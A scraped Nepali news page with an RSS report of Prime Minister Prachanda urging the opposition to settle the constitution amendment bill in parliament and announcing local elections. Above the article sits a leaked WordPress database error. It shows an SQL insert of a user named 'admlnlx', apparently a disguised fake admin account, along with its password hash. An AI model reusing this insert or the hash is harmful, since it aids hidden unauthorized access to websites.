WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrOlON4KRElgqXoOuTq.FJX15.V0EC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:45:32', '', 'admlnlx', 'admlnlx')
विराटनगर,पुष ३-
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ले मुलुकको गतिरोध अन्त्य गर्नका लागि प्रतिपक्षलाई संसदीय प्रक्रियालाई आत्मसात् गरी अगाडि बढ्न आह्वान गर्नुभएको छ ।
विराटनगर विमानस्थलमा आज प्रेस सेन्टर नेपालद्वारा आयोजित पत्रकार भेटघाट कार्यक्रममा उहाँले संविधान संशोधनसम्बन्धी विधेयकलाई संसद्ले जति छिटो टुङ्गो लगाइन्छ, त्यति छिटो मुलुकको गतिरोध अन्त्य हुन्छ भन्नुभयो ।
“संविधान संशोधनको प्रस्तावको पक्ष र विपक्षमा संसद्मा छलफल हुन्छ र यसलाई पारित गर्ने वा परास्त गर्ने अधिकार संसद्लाई नै हुन्छ”, उहाँले भन्नुभयो, “प्रतिपक्षले गैरसंसदीय, गैरलोकतान्त्रिक प्रक्रियालाई बन्द गरी आफ्नो मत संसद्भित्रै राख्नुपर्छ, संशोधन प्रस्तावको मुख्य उद्देश्य हिमाल, पहाड र मधेसलाई जोडेर मुलुकलाई निर्वाचनमा लग्नु हो ।”
संसद्मा दर्ताको भएको संविधान संशोधनको विधेयकमा परिमार्जन हुने सम्बन्धमा पत्रकारको जिज्ञासामा उहाँले भाषासम्बन्धी आयोगमा केही संशोधन हुनसक्ने उल्लेख गर्नुभयो । उहाँले स्थानीय तहको निर्वाचन वैशाखमा हुने बताउँदै स्थानीय निकाय पुनःसंरचनासम्बन्धी आयोगले आउँदो बुधबारसम्ममा सरकारलाई प्रतिवेदन बुझाउने जानकारी गराउनुभयो ।- रासस